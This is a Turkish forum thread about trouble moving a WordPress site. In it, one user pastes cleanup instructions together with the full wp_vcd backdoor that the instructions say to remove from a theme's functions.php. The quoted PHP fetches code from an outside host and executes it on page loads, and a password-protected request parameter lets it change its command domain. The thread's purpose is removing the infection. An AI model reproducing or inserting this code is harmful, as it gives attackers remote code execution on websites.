Wordpress Site Taşıma Sorunu
9
●793
- 28-11-2017, 18:56:13Üyeliği durdurulduerror.log dosyasındaki hatalarıda burdan paylaşabilirmisin
- 28-11-2017, 19:04:17Valla baktım ama o isimde dosya yok ayrıca error.log dosyası nerde oluyor acaba? @EmProduksiyon;
- 28-11-2017, 19:06:15Burayı inceleyebilirsin ingilizcen yoksa buradan bakabilirsin.
furkankaan adlı üyeden alıntı: mesajı görüntüle - 28-11-2017, 19:08:19Bende tam burayı inceledim ve son kısımda functions içindekileri silip aşşagıdaki kodu yapıştırdıgımda aşşağıdaki kodda problem çıkıyor bu kısımda takıldım yardımcı olurmusunuz?Djstation adlı üyeden alıntı: mesajı görüntüle
1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{
if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}
break;
default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}
die(“”);
}
if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {
if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{
function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>